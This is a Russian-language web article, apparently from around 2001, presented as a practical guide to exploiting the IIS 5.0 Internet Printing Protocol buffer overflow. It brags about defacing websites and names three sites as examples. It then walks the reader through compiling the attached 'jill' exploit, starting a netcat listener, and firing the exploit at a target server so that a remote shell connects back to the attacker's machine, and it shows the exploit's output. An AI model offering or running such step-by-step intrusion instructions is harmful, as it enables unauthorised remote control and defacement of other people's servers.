Базы данныхИнтернетКомпьютерыОперационные системыПрограммированиеСетиСвязьРазное
Поиск по сайту:
Подпишись на рассылку:

Назад в раздел

Дырка IPP: практическое руководство.

div.main {margin-left: 20pt; margin-right: 20pt}Дырка IPP: практическое руководство.

С 19 апреля в инете было очень весело из-за дырени Internet Printing Protocol buffer overflow в IIS 5.0. Сия радость дает нам (и сколько еще даст) удаленный шелл на серваках под NT_IIS 5.0. Только сегодня уже стало просто лень дефасить сайты.

Для примера :
http://mededinteractive.com/ (картинка)
http://royalfamily.org/ (картинка)
http://lexington.com/  (картинка)

Как юзать? Просто очень.

Заливай exploit (прилагается), компили. Затем заливай NetCat (прилагается) запускай под виндой командой:

netcat -l -p 12312 -vv (где 12312 - порт на котором установлен слухач). 

Теперь можно под юнихом запустить скомпиленный exploit:

../jill www.dead-server.com 80 my_nt_machine_with_Netcat 12312

iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
connecting...
sent...
you may need to send a carriage on your listener if the shell doesn't appear.
have fun!

Все, после того как exploit кинул на сервак кучу мусора, твой запущенный NetCat на порту 12312 получает удаленный шелл сервака. 

Теперь можно ваять что угодно.



  • Главная
  • Новости
  • Новинки
  • Скрипты
  • Форум
  • Ссылки
  • О сайте




  • Emanual.ru – это сайт, посвящённый всем значимым событиям в IT-индустрии: новейшие разработки, уникальные методы и горячие новости! Тонны информации, полезной как для обычных пользователей, так и для самых продвинутых программистов! Интересные обсуждения на актуальные темы и огромная аудитория, которая может быть интересна широкому кругу рекламодателей. У нас вы узнаете всё о компьютерах, базах данных, операционных системах, сетях, инфраструктурах, связях и программированию на популярных языках!
     Copyright © 2001-2024
    Реклама на сайте